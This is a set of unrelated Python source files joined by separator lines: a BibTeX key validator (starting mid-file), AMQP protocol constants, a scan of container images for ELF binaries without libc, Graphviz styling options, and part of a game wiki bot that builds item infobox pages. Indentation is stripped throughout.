# if 1 < (number of tokens)
# return false;
# else
# return true;
#
# Implementation (2):
# Enumerate each character of the BibTeX key.
# if current character is a white space character
# return false
# return true
#
# Choose implementation (1).
#
# @return a boolean TRUE if the BibTeX key has no white space.
# Else, return FALSE.
# O(n) method, where n is the number of characters of the key.
@staticmethod
def has_no_whitespace(str):
# The method below does not work with leading and
# trailing white space.
#tokens = string.split(str)
tokens = re.split('\t| |\n',str)
#print " number of tokens:",len(tokens),"."
if 1 < len(tokens):
return False
else:
return True
# =========================================================
# Method to check if the BibTeX key has only alphanumeric
# characters.
# @return - Nothing.
# O(n) method, where n is the number of characters of the key.
@staticmethod
def has_only_alphanumeric_characters(str):
return str.isalnum()
# =========================================================
# Method to tokenize the first line of each BibTeX entry,
# which contains a unique BibTeX key.
#
# Tokenize the string such that it would contain exactly
# two tokens, the BibTeX entry type (without the "@"
# prefix) and the BibTeX key.
#
# When the first line of a BibTeX entry is tokenized, its
# first token shall match a standard BibTeX entry type,
# and its second token shall be its BibTeX key.
# If the first non-empty token does not match a standard
# BibTeX entry type, raise an exception to inform the
# users of this error.
# If the second non-empty token is an empty string or
# missing, raise an exception to inform the users
# that the BibTeX key is missing.
# If more than two non-empty tokens (i.e., three or more)
# exist, raise an exception to inform the users about
# the non-compliance to guidelines \cite{Ong2017} for
# managing the database.
#
#
# @return a tokenized string representing the BibTeX key.
# O(n) method, where n is the character length of the string.
@staticmethod
def tokenization_entry_key(str):
tokenized_BibTeX_entry = re.split('@|{|,',str)
#print "= length of tokenized_BibTeX_entry:",len(tokenized_BibTeX_entry)
#print tokenized_BibTeX_entry
if len(tokenized_BibTeX_entry) > 4:
#print " Tokenization produces too many tokens."
raise Exception(" Non-compliance to BibTeX guidelines!!!")
elif len(tokenized_BibTeX_entry) == 4:
# Is the type of the BibTeX entry valid?
if (tokenized_BibTeX_entry[1] in queue_ip_args.BibTeX_entry_types):
# Yes. Is the 4th token a non-empty string?
if tokenized_BibTeX_entry[3]:
# Yes. Report non-compliance to BibTeX guidelines.
#print " Extra token found in 1st line of BibTeX entry."
raise Exception(" Non-compliance to BibTeX guidelines! Extra token found in 1st line of BibTeX entry.")
# No. Try adding the BibTeX entry to "set_of_BibTeX_keys".
return tokenized_BibTeX_entry[2]
else:
# No. Warn user that the type of BibTeX entry is invalid!
temp_str = "==> Invalid type of BibTeX entry:"+tokenized_BibTeX_entry[1]
#print temp_str
warnings.warn(temp_str)
raise Exception("BibTeX entry has an invalid type!")
elif len(tokenized_BibTeX_entry) == 1:
raise Exception(" BibTeX key is missing!!!")
else:
raise Exception(" String tokenization error!!!")
|
FRAME_METHOD = 1
FRAME_HEADER = 2
FRAME_BODY = 3
FRAME_HEARTBEAT = 8
FRAME_MIN_SIZE = 4096
FRAME_END = 206
REPLY_SUCCESS = 200
CONTENT_TOO_LARGE = 311 # soft-error
NO_ROUTE = 312 # soft-error
NO_CONSUMERS = 313 # soft-error
ACCESS_REFUSED = 403 # soft-error
NOT_FOUND = 404 # soft-error
RESOURCE_LOCKED = 405 # soft-error
PRECONDITION_FAILED = 406 # soft-error
CONNECTION_FORCED = 320 # hard-error
INVALID_PATH = 402 # hard-error
FRAME_ERROR = 501 # hard-error
SYNTAX_ERROR = 502 # hard-error
COMMAND_INVALID = 503 # hard-error
CHANNEL_ERROR = 504 # hard-error
UNEXPECTED_FRAME = 505 # hard-error
RESOURCE_ERROR = 506 # hard-error
NOT_ALLOWED = 530 # hard-error
NOT_IMPLEMENTED = 540 # hard-error
INTERNAL_ERROR = 541 # hard-error
id2constant = {
1: "FRAME_METHOD",
2: "FRAME_HEADER",
3: "FRAME_BODY",
8: "FRAME_HEARTBEAT",
4096: "FRAME_MIN_SIZE",
206: "FRAME_END",
200: "REPLY_SUCCESS",
311: "CONTENT_TOO_LARGE",
312: "NO_ROUTE",
313: "NO_CONSUMERS",
403: "ACCESS_REFUSED",
404: "NOT_FOUND",
405: "RESOURCE_LOCKED",
406: "PRECONDITION_FAILED",
320: "CONNECTION_FORCED",
402: "INVALID_PATH",
501: "FRAME_ERROR",
502: "SYNTAX_ERROR",
503: "COMMAND_INVALID",
504: "CHANNEL_ERROR",
505: "UNEXPECTED_FRAME",
506: "RESOURCE_ERROR",
530: "NOT_ALLOWED",
540: "NOT_IMPLEMENTED",
541: "INTERNAL_ERROR",
}
|
import os, sys, subprocess, signal
import logging
import optparse
import util
def isValidOpts(opts):
"""
Check if the required options are sane to be accepted
- Check if the provided files exist
- Check if two sections (additional data) exist
- Read all target libraries to be debloated from the provided list
:param opts:
:return:
"""
if not options.outputpath:
parser.error("Option -o should be provided.")
return False
return True
def setLogPath(logPath):
"""
Set the property of the logger: path, config, and format
:param logPath:
:return:
"""
if os.path.exists(logPath):
os.remove(logPath)
rootLogger = logging.getLogger("coverage")
if options.debug:
logging.basicConfig(filename=logPath, level=logging.DEBUG)
rootLogger.setLevel(logging.DEBUG)
else:
logging.basicConfig(filename=logPath, level=logging.INFO)
rootLogger.setLevel(logging.INFO)
# ch = logging.StreamHandler(sys.stdout)
consoleHandler = logging.StreamHandler()
rootLogger.addHandler(consoleHandler)
return rootLogger
# rootLogger.addHandler(ch)
if __name__ == '__main__':
"""
Main function for finding physical memory usage of process
"""
usage = "Usage: %prog -e <Target executable path> -p <PID of process to retrieve information about>"
parser = optparse.OptionParser(usage=usage, version="1")
parser.add_option("-o", "--outputpath", dest="outputpath", default=None, nargs=1,
help="Output folder path")
parser.add_option("-d", "--debug", dest="debug", action="store_true", default=False,
help="Debug enabled/disabled")
(options, args) = parser.parse_args()
if isValidOpts(options):
rootLogger = setLogPath("checkstaticlibc.log")
lib = ".so"
for folderName in os.listdir(options.outputpath):
fileList = list()
removeList = list()
rootLogger.info("////////////Checking image: %s//////////////////", folderName)
folderName = os.path.join(options.outputpath, folderName)
if ( os.path.isdir(folderName) ):
for fileName in os.listdir(folderName):
if ( util.isElf(folderName + "/" + fileName) ):
if ( lib not in fileName ):# or fileName.startswith(exceptItem) or util.isGo(folderName + "/" + fileName, rootLogger) ):
fileHeader = util.extractDynamicHeader(folderName + "/" + fileName)
if ( fileHeader != "" and "libc" not in fileHeader and "musl" not in fileHeader ):
rootLogger.info("elf without libc: %s", fileHeader)
'''finalSet = set(fileList) - set(removeList)
# rootLogger.info("List of binaries for %s: %s", folderName, str(finalSet))
for filePath in finalSet:
#rootLogger.debug("extraction direct syscall for %s", filePath)
temp1 = util.extractDirectSyscalls(filePath, rootLogger)
temp2 = util.extractLibcSyscalls(filePath, rootLogger)
if ( temp1 != 0 or temp2 != 0 ):
rootLogger.debug("filePath: %s is libcSyscall: %d directSyscall: %d", filePath, temp2, temp1)'''
|
"""Module for handling the different draw options for nodes. Used when creating a .dot file respresentation of the pipeline."""
_DEFAULT_DRAW_OPTIONS = {'shape': 'box', 'style': 'filled'}
_DEFAULT_AQP_OPTIONS = {'fillcolor': '#ffffff'}
_DEFAULT_VISQOL_OPTIONS = {'fillcolor': '#F0E442B3'}
_DEFAULT_PESQ_OPTIONS = {'fillcolor': '#E69F00B3'}
_DEFAULT_WARP_Q_OPTIONS = {'fillcolor': '#0072B2B3'}
_DEFAULT_NESTED_OPTIONS = {'fillcolor': '#009E73B3'}
DRAW_OPTIONS = {
'AQP': _DEFAULT_AQP_OPTIONS,
'ViSQOL': _DEFAULT_VISQOL_OPTIONS,
'PESQ': _DEFAULT_PESQ_OPTIONS,
'WARP-Q': _DEFAULT_WARP_Q_OPTIONS,
'NESTED': _DEFAULT_NESTED_OPTIONS
}
def create_full_options(default_options: dict=_DEFAULT_DRAW_OPTIONS,
other_options: dict=None):
"""Merge the default options and other options to create the full dict of draw options.
Merges the draw options dict passed from JSON with the default options for
a particular node type.
Parameters
----------
default_options : dict, optional
The default options unique for a particular node type to be used.
The default is _DEFAULT_DRAW_OPTIONS.
other_options : dict, optional
Any other draw options passed from JSON. The default is None.
Returns
-------
draw_options: dict
Merged dict from the two dictionaries passed to the function.
"""
if other_options is None:
other_options = {}
return {**_DEFAULT_DRAW_OPTIONS, **default_options, **other_options}
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import json
import os
import html
import re
import decimal
import math
from collections import OrderedDict
from contextlib import suppress
import requests
from SFIWikiBotLib import Config
from SFIWikiBotLib import SmallConstants
from SFIWikiBotLib import GeneralUtils
from SFIWikiBotLib import WikiUtils
from SFIWikiBotLib import GalaxyUtils
from SFIWikiBotLib import DataLoader
itemPurchasePriceModifier = 1.175
# itemPurchasePriceModifier = 1.17645 # I believe this is the correct value but need to re-test to be sure
ammoCostModifier = 0.144
itemsToSkip = [
"Disheartener Beacon",
"Double Barrelled Heavy Bolt I",
"Double Barrelled Heavy Bolt II",
"Double Barrelled Heavy Bolt III",
"Double Barrelled Heavy Bolt IV",
"Double Barrelled Heavy Bolt V",
"Wabbajack",
"Big Smoke Screen",
"Firework Pellet",
"Cake Slice",
"Candle Torpedo",
"Micro Gate TBZ",
"Tyraan Decay Cannon",
"Shard Torpedo",
"Igni Rock Rocket I",
]
itemIdListToSkip = []
beamWeaponOverrideList = [
'Resonator Beam'
]
beamWeaponOverrideIdList = []
rarePlayerRaceDropList = [
'Dimensional Clone Bomb',
'Crate of Meat Patties',
'Promotional Burger',
]
rarePlayerRaceDropIdList = []
itemData = None
itemDataDict = None
itemRangeData = None
itemVariantData = None
itemCraftableData = None
itemDataPublic = None
itemDataPrivate = None
itemBaseNameList = []
class ItemPageIter:
"""Iterator that takes an item list and groups it by item set."""
def __init__(self, itemList=...):
if itemList is ...:
itemList = itemData
itemList = itemList.copy()
self.itemPageList = []
self.pos = 0
while len(itemList) > 0:
curItemList = GetAllItemsSharingItemRange(itemList[-1], itemList)
curItemList = sorted(curItemList, key=GetItemSortFunc())
self.itemPageList.append(curItemList)
for i in curItemList:
if i in itemList: itemList.remove(i)
def __iter__(self):
return self
def __len__(self):
return len(self.itemPageList)
def __next__(self):
idx = self.pos
if idx >= len(self.itemPageList):
raise StopIteration
self.pos += 1
return self.itemPageList[idx]
def reset(self):
self.pos = 0
def FindAllObjectsRelatedToId(id):
ruleSet = {
'condition': 'OR',
'rules': [
{ 'id': 'id', 'operator': '==', 'value': id, },
{ 'id': 'range', 'operator': '==', 'value': id, },
{ 'id': 'items', 'operator': 'in_list', 'value': id, },
{ 'id': 'subWeaponID', 'operator': '==', 'value': id, },
]
}
rtnList = GeneralUtils.SearchObjectListUsingRuleset(itemData, ruleSet)
rtnList += GeneralUtils.SearchObjectListUsingRuleset(itemRangeData.values(), ruleSet)
rtnList += GeneralUtils.SearchObjectListUsingRuleset(itemVariantData, ruleSet)
rtnList += GeneralUtils.SearchObjectListUsingRuleset(itemCraftableData.values(), ruleSet)
return rtnList
def GetListOfItemsMissingWikiPages(includeHidden=False):
if includeHidden:
return [ v for v in itemData if not GetItemWikiArticlePage(v) and v['type'] > 1 ]
else:
return [ v for v in itemData if not GetItemWikiArticlePage(v) and v['type'] > 1 and not IsItemHidden(v) ]
def FindItemsByPartialName(name, objList=...):
if objList is ...:
objList = itemData
ruleSet = { "condition": "OR", "rules": [ { "id": "name", "operator": "contains", "value": name } ] }
return sorted(GeneralUtils.SearchObjectListUsingRuleset(objList, ruleSet), key=GetItemSortFunc())
def DownloadMissingImagesForTheWikiByItemList(itemList):
rtnVal = 0
for item in itemList:
wikiImage = GetItemWikiImage(item)
if not wikiImage:
if DownloadImageForItem(item):
rtnVal += 1
return rtnVal
def DownloadImagesByItemList(itemList):
rtnVal = 0
for item in itemList:
if DownloadImageForItem(item):
rtnVal += 1
return rtnVal
def DownloadImageForItem(item):
rtnVal = False
itemType = SmallConstants.typeLookup[item['type']].replace('_WEAPON', '').title()
iconName = item['id']
if 'iconName' in item and item['iconName']:
iconName = item['iconName']
filedir = os.path.join('public', 'images', itemType)
os.makedirs(filedir, exist_ok=True)
filepath = os.path.join(filedir, "{}.png".format(iconName))
if not os.path.exists(filepath):
try:
url = GetItemImageUrl(item)
r = requests.get(url)
if r.status_code == 200:
with open(filepath, 'wb') as f:
f.write(r.content)
if Config.verbose >= 1: print(item['name'], "- Image saved successfully")
rtnVal = True
else:
if Config.verbose >= 1: print("Image not found for item", item['name'])
except:
print("{} - failed to save the image\nUrl: [{}]\nLocal path [{}]\n\n".format(item['name'], url, filepath))
raise
return rtnVal
def UploadImagesToWikiForItemList(itemList):
itemImageInfoList = [ GetImageUploadDownloadInfoForItem(i) for i in itemList ]
return WikiUtils.UploadImageListToWiki(itemImageInfoList)
def GetDisplayDataForItemList(itemList, headingList):
tableData = []
for item in itemList:
row = OrderedDict()
for heading in headingList:
row[heading] = GetHtmlStatDisplayForObject(heading, item)
tableData.append(row)
return tableData
def GetWikiDisplayDataForItemList(itemList, headingList):
tableData = []
for item in itemList:
row = OrderedDict()
for heading in headingList:
row[heading] = GetStatDisplayForObject(heading, item)
tableData.append(row)
return tableData
def GetStatNameDescriptions(statList, pageType=''):
descList = []
for statName in statList:
descList.append(GetDescriptionForItemStatName(statName, pageType))
return descList
def GetItemPageContentForItemRangeList(itemList, existingPageValues={}):
if not itemList:
return ''
pageHeader = '__NOTOC__\n'
pageFooter = '\n{{Template:Equipment}}\n[[Category:Items]]\n'
primaryItem = itemList[-1]
nameInfo = SplitNameIntoBaseNameAndItemLevel(primaryItem['name'])
itemCatList = GetCategoryListForItem(primaryItem)
for catName in itemCatList:
pageFooter += '[[Category:{}]]\n'.format(catName)
source = GetItemSource(primaryItem)
sourceClass = GetItemSourceClassName(primaryItem)
if source is not None and sourceClass:
source = '<span class="{}">{}</span>'.format(sourceClass, source)
if sourceClass:
name = '<span class="{}">{}</span>'.format(sourceClass, nameInfo['fullNameMinusLevel'])
else:
name = nameInfo['fullNameMinusLevel']
infoBox = GetWikiInfoboxDataForItemRangeList(itemList)
itemTemplateData = OrderedDict()
itemTemplateData["itemname"] = name
itemTemplateData["methodOfObtaining"] = source
itemTemplateData["itemSlot"] = ItemDisplayStatItemType(primaryItem, 'itemPage')
itemTemplateData["description"] = ''
itemTemplateData["gameDescription"] = "\n\n".join(GetDescriptionForItemRangeList(itemList, "''"))
itemTemplateData["functionality"] = ''
itemTemplateData["interactionsAndStrategy"] = ''
itemTemplateData["trivia"] = ''
itemTemplateData.update(existingPageValues)
content = pageHeader
content += WikiUtils.ConvertDictionaryToWikiTemplate(infoBox['name'], infoBox['data'])
content += WikiUtils.ConvertDictionaryToWikiTemplate('ItemFormat', itemTemplateData)
content += pageFooter
return content
def GetWikiInfoboxDataForItemRangeList(itemList):
if not itemList:
return {"Name": None, "data": None}
itemType = SmallConstants.typeLookup[itemList[-1]['type']].replace('_', ' ').title()
if itemType == "Mineral":
return {"Name": None, "data": None}
rtnVal = {
"name": "Infobox_{}".format(itemType.replace(' ', '')),
"data": None,
}
if itemType == "Primary Weapon":
rtnVal['data'] = GetWikiInfoboxDataForPrimaryOrSecondary(itemList)
elif itemType == "Secondary Weapon":
rtnVal['data'] = GetWikiInfoboxDataForPrimaryOrSecondary(itemList)
elif itemType == "Engine":
rtnVal['data'] = GetWikiInfoboxDataForEngine(itemList)
elif itemType == "Shield":
rtnVal['data'] = GetWikiInfoboxDataForShield(itemList)
elif itemType == "Augmentation":
rtnVal['data'] = GetWikiInfoboxDataForAugmentation(itemList)
elif itemType == "Collectible":
rtnVal['data'] = GetWikiInfoboxDataForCollectible(itemList)
return rtnVal
def GetWikiInfoboxDataForPrimaryOrSecondary(itemList):
# Template name is Infobox_PrimaryWeapon, Infobox_SecondaryWeapon
primaryItem = itemList[-1]
infobox = OrderedDict()
damageType = GetItemDamageType(primaryItem)
isBeam = IsBeamWeapon(primaryItem)
weaponType = SmallConstants.weaponTypeLookup[primaryItem['weaponType']].title()
splitItemName = SplitNameIntoBaseNameAndItemLevel(primaryItem['name'])
source = GetItemSourceExtended(primaryItem, True)
sourceClass = GetItemSourceClassName(primaryItem)
if source is not None:
if sourceClass:
infobox['source'] = '<span class="{}">{}</span>'.format(sourceClass, source)
else:
infobox['source'] = source
if sourceClass:
infobox['title1'] = '<span class="{}">{}</span>'.format(sourceClass, splitItemName['fullNameMinusLevel'])
else:
infobox['title1'] = splitItemName['fullNameMinusLevel']
image = GetItemWikiImage(primaryItem)
if image:
infobox['image1'] = image
infobox['weapon_type'] = ItemDisplayStatItemType(primaryItem)
vdata = [ GetItemSkillLevel(i) for i in itemList ]
displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join([str(x) for x in vdata])
if displayData != '999':
infobox['required_skill'] = "{} {}".format(GetItemSkillName(primaryItem), displayData)
# vdata = [ ItemDisplayStatDamage(i, False, False) for i in itemList ]
# if vdata[0] is not None and str(vdata[0]) != '0':
# displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
# infobox['damage_per_round'] = displayData
if not DisplayDamageAsPerHit(primaryItem):
vdata = [ GeneralUtils.NumDisplay(GetDamagePerRoundForItem(i), 1) for i in itemList ]
if vdata[0] != '0':
if DisplayDamageAsPerSecond(primaryItem):
vdata = [ '{}/s'.format(i) for i in vdata ]
displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
infobox['damage_per_round'] = '{} {}'.format(displayData, GetDamageTypeIconForItem(primaryItem)).strip()
else:
vdata = [ GeneralUtils.NumDisplay(GetDamagePerRoundForItem(i), 1) for i in itemList ]
if vdata[0] != '0':
vdata = [ '{}/hit'.format(i) for i in vdata ]
displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
infobox['damage_per_hit'] = '{} {}'.format(displayData, GetDamageTypeIconForItem(primaryItem)).strip()
with suppress(ZeroDivisionError, TypeError):
vdata = [ GeneralUtils.NumDisplay(GetItemTotalHitCount(i) / GetItemLife(i), 1) for i in itemList ]
if vdata[0] != '0':
displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
infobox['hits_per_second'] = displayData
with suppress(ZeroDivisionError):
if weaponType != 'Large':
vdata = [ GeneralUtils.NumDisplay(i['fireRate'], 1) for i in itemList ]
aboveOne = 0
for d in set(vdata):
aboveOne += 1 if decimal.Decimal(d) >= 1 else 0
overallUseShotsPerSecond = False
if aboveOne < len(set(vdata)) - aboveOne:
overallUseShotsPerSecond = True
vdata = [ GeneralUtils.NumDisplay(1 / i['fireRate'], 1) for i in itemList ]
displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join(vdata)
if displayData != '0':
if overallUseShotsPerSecond:
infobox['fire_rate'] = "{} per sec".format(displayData)
else:
displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join(vdata)
infobox['fire_rate'] = "1 per {} sec".format(displayData)
if 'damage_per_round' in infobox:
vdata = [ GetNumOfDamagingProjectiles(i, True) for i in itemList ]
if vdata[-1] > 1:
displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join([str(v) for v in vdata])
infobox['amount'] = displayData
if not DisplayDamageAsPerSecond(primaryItem) or 'damage_per_round' not in infobox:
vdata = [ ItemDisplayStatTotalDps(i, ..., False) for i in itemList ]
if vdata[0] is not None:
displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
if displayData != '0':
# if GeneralUtils.floatCmp(GetDamagePerRoundForItem(primaryItem), '>', 0):
# displayData = '{} {}'.format(displayData, GetDamageTypeIconForItem(primaryItem)).strip()
# if GeneralUtils.floatCmp(GetItemEffectDamage(primaryItem), '>', 0):
# displayData = '{} {}'.format(displayData, GetEffectIconForItem(primaryItem)).strip()
infobox['damage_per_second'] = displayData
damageType = GetDamageTypeForItem(primaryItem)
if damageType:
damageTypeCat = GetDamageTypeForItem(primaryItem, True)
if damageTypeCat:
infobox['damage_type'] = "[[:Category:Damage:{}|{}]]".format(damageTypeCat, damageType)
else:
infobox['damage_type'] = damageType
vdata = [ ItemDisplayStatTotalDamagePerVolley(i, ..., False) for i in itemList ]
if vdata[0] is not None and vdata[0] != '0':
displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
# if GeneralUtils.floatCmp(GetDamagePerRoundForItem(primaryItem), '>', 0):
# displayData = '{} {}'.format(displayData, GetDamageTypeIconForItem(primaryItem)).strip()
# if GeneralUtils.floatCmp(GetItemEffectDamage(primaryItem), '>', 0):
# displayData = '{} {}'.format(displayData, GetEffectIconForItem(primaryItem)).strip()
if 'damage_per_round' not in infobox or infobox['damage_per_round'] != displayData:
infobox['total_damage_per_volley'] = displayData
if primaryItem['energyBased']:
vdata = [ ItemDisplayStatTotalDpe(i) for i in itemList ]
if vdata[0] is not None:
displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
infobox['damage_per_energy'] = displayData
if primaryItem['energyBased']:
vdata = [ GeneralUtils.NumDisplay(i['ammoOrEnergyUsage'], 2) for i in itemList ]
if vdata[0] != '0':
displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
infobox['energy_usage'] = displayData
else:
vdata = [ i['ammoOrEnergyUsage'] for i in itemList ]
if GeneralUtils.floatCmp(vdata[0], '>', 0):
if weaponType == 'Large':
displayData = GeneralUtils.NumDisplay(vdata[0], 0) if len(set(vdata)) == 1 else " / ".join([GeneralUtils.NumDisplay(x, 0) for x in vdata])
else:
displayData = "{} ({})".format(GeneralUtils.NumDisplay(vdata[0], 0), GeneralUtils.NumDisplay(vdata[0] * 5, 0)) if len(set(vdata)) == 1 else " / ".join(["{} ({})".format(GeneralUtils.NumDisplay(x, 0), GeneralUtils.NumDisplay(x * 5, 0)) for x in vdata])
infobox['ammo'] = displayData
vdata = [ (GeneralUtils.NumDisplay(GetItemAmmoCost(i), 0, True) if GetItemAmmoCost(i) > 0 else None) for i in itemList ]
if vdata[0] is not None:
displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
infobox['ammo_cost'] = displayData
if primaryItem['guidance'] == 1 or primaryItem['guidance'] == 5:
infobox['requires_lock'] = 'Yes'
vdata = [ GeneralUtils.NumDisplay(i['lockingRange'], 1) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
infobox['locking_range'] = '{}su'.format(displayData)
else:
infobox['requires_lock'] = 'No'
if 'locking_range' not in infobox:
vdata = [ GeneralUtils.NumDisplay(GetItemRange(i), 0) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
if displayData and displayData != '0':
infobox['range'] = '{}su'.format(displayData)
if primaryItem['guidance'] != 3:
vdata = [ GeneralUtils.NumDisplay(GetItemMinRange(i), 1) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else " / ".join(vdata)
if displayData:
infobox['min_range'] = '{}su'.format(displayData)
if not isBeam and 'Vortex Bomb' not in primaryItem['name']:
vdata = [ GeneralUtils.NumDisplay(GetItemMaxSpeed(i), 1) for i in itemList ]
if vdata[0] != '0' and vdata[0] != '':
displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join(vdata)
infobox['speed'] = "{}su/s".format(displayData)
if 'speed' in infobox:
vdata = [ GeneralUtils.NumDisplay(GetItemInitialSpeed(i), 1) for i in itemList ]
if vdata[0] != '0' and vdata[0] != '':
displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join(vdata)
initialSpeedDisplay = "{}su/s".format(displayData)
if initialSpeedDisplay != infobox['speed']:
infobox['initial_speed'] = initialSpeedDisplay
if 'initial_speed' in infobox and GeneralUtils.floatCmp(primaryItem['acceleration'], '>', 0):
vdata = [ GeneralUtils.NumDisplay(i['acceleration'], 2) for i in itemList ]
if vdata[0] != '0' and vdata[0] != '':
displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join(vdata)
infobox['acceleration'] = "{}su/s/s".format(displayData)
largeWeaponsWithLifetimeList = ['Thunderbomb', 'Tornadian Hurricane', 'Radicane', 'Firestorm', 'Vortex Bomb', 'Ultra Vortex Bomb', 'Anti Vortex Bomb', 'Ghostly Vortex Bomb']
if not isBeam and (weaponType != 'Large' or primaryItem['name'] in largeWeaponsWithLifetimeList):
if 'Vortex Bomb' in primaryItem['name']:
vdata = [ GeneralUtils.NumDisplay(i['effectTime'], 1) for i in itemList ]
else:
vdata = [ GeneralUtils.NumDisplay(GetItemLife(i), 1) for i in itemList ]
if vdata[0] != '0':
displayData = str(vdata[0]) if len(set(vdata)) == 1 else "s / ".join(vdata)
infobox['lifetime'] = "{}s".format(displayData)
if not isBeam and weaponType != 'Mine' and weaponType != 'Proximity':
vdata = [ GeneralUtils.NumDisplay(i['accuracy'], 1) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "° / ".join(vdata)
if weaponType in ['Secondary', 'Primary'] or displayData != '0':
infobox['accuracy'] = "{}°".format(displayData)
vdata = [ GeneralUtils.NumDisplay(i['turning'] * Config.turnMultiplier, 1) for i in itemList ]
if vdata[0] != '0':
displayData = vdata[0] if len(set(vdata)) == 1 else "° / ".join(vdata)
infobox['turning'] = "{}°".format(displayData)
armIsNotLifeExceptionList = ['Thunderbomb', 'Tornadian Hurricane']
if weaponType == 'Large' and primaryItem['name'] not in armIsNotLifeExceptionList:
vdata = [ GeneralUtils.NumDisplay(GetItemLife(i), 1) for i in itemList ]
else:
vdata = [ GeneralUtils.NumDisplay(i['armingTime'], 1) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "s / ".join(vdata)
if displayData != '0':
infobox['arming_time'] = "{}s".format(displayData)
effectList = GetEffectNameListForItem(primaryItem)
if effectList:
infobox['effect'] = ''
for effectName in effectList:
infobox['effect'] += '[[:Category:Effect:{}|{}]]<br>\n'.format(effectName, effectName)
if 'effect' in infobox and primaryItem['effectTime'] >= 0:
if len(effectList) > 1 or effectList[0] != 'Negative Impact' or primaryItem['effectTime'] > 0:
vdata = [ GeneralUtils.NumDisplay(i['effectTime'], 1) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "s / ".join(vdata)
infobox['effect_time'] = "{}s".format(displayData)
vdata = [ ItemDisplayStatBPLocation(i) for i in itemList ]
if vdata[0]:
displayData = vdata[0] if len(set(vdata)) == 1 else "<br>\n".join(vdata)
infobox['blueprint_location'] = displayData
return infobox
def GetWikiInfoboxDataForEngine(itemList):
# Template name is Infobox_Engine
primaryItem = itemList[-1]
infobox = OrderedDict()
splitItemName = SplitNameIntoBaseNameAndItemLevel(primaryItem['name'])
source = GetItemSourceExtended(primaryItem, True)
sourceClass = GetItemSourceClassName(primaryItem)
if source is not None:
if sourceClass:
infobox['source'] = '<span class="{}">{}</span>'.format(sourceClass, source)
else:
infobox['source'] = source
if sourceClass:
infobox['title1'] = '<span class="{}">{}</span>'.format(sourceClass, splitItemName['fullNameMinusLevel'])
else:
infobox['title1'] = splitItemName['fullNameMinusLevel']
image = GetItemWikiImage(primaryItem)
if image:
infobox['image1'] = image
vdata = [ GetItemSkillLevel(i) for i in itemList ]
displayData = str(vdata[0]) if len(set(vdata)) == 1 else " / ".join([str(x) for x in vdata])
if displayData != '999':
infobox['required_skill'] = "{} {}".format(GetItemSkillName(primaryItem), displayData)
vdata = [ GeneralUtils.NumDisplay(i['maxSpeedMod'], 3) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
if displayData != '0':
infobox['speed'] = "{}x".format(displayData)
vdata = [ GeneralUtils.NumDisplay(i['reverseSpeedMod'], 3) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
if displayData != '0':
infobox['reverse'] = "{}x".format(displayData)
vdata = [ GeneralUtils.NumDisplay(i['accelMod'], 3) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
if displayData != '0':
infobox['acceleration'] = "{}x".format(displayData)
vdata = [ GeneralUtils.NumDisplay(i['turningMod'], 3) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
if displayData != '0':
infobox['turning'] = "{}x".format(displayData)
vdata = [ GeneralUtils.NumDisplay(i['propulsionEnhance'], 3) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "x / ".join(vdata)
infobox['propulsion'] = "{}x".format(displayData)
with suppress(KeyError):
vdata = [ GeneralUtils.NumDisplay(i['propulsionEnhanceTime'], 3) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "s / ".join(vdata)
if displayData != '0':
infobox['boost_duration'] = "{}s".format(displayData)
with suppress(KeyError):
vdata = [ GeneralUtils.NumDisplay(i['propulsionEnhanceCooldown'] * i['propulsionEnhanceTime'], 2) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else "s / ".join(vdata)
if displayData != '0':
infobox['boost_cooldown'] = "{}s".format(displayData)
if infobox['boost_cooldown'] == infobox['boost_duration']:
del infobox['boost_cooldown']
vdata = [ GeneralUtils.NumDisplay(i['autoPilotSpeedInc'], 3) for i in itemList ]
displayData = vdata[0] if len(set(vdata)) == 1 else " / +".join(vdata)
if displayData != '0':
infobox['autopilot'] = "+{}".format(displayData)
vdata = [ ItemDisplayStatBPLocation(i) for i in itemList ]
if vdata[0]:
displayData = vdata[0] if len(set(vdata)) == 1 else "<br>\n".join(vdata)
infobox['blueprint_location'] = displayData
return infobox
def GetWikiInfoboxDataForShield(itemList):
# Template name is Infobox_Shield
primaryItem = itemList[-1]
infobox = OrderedDict()
splitItemName = SplitNameIntoBaseNameAndItemLevel(primaryItem['name'])
source = GetItemSourceExtended(primaryItem, True)
sourceClass = GetItemSourceClassName(primaryItem)
if source is not None:
if sourceClass:
infobox['source'] = '<span class="{}">{}</span>'.format(sourceClass, source)
else:
infobox['source'] = source
if sourceClass:
infobox['title1'] = '<span class="{}">{}</span>'.format(sourceClass, splitItemName['fullNameMinusLevel'])
else:
infobox['title1'] = splitItemName['fullNameMinusLevel']
image = GetItemWikiImage(primaryItem)
if image:
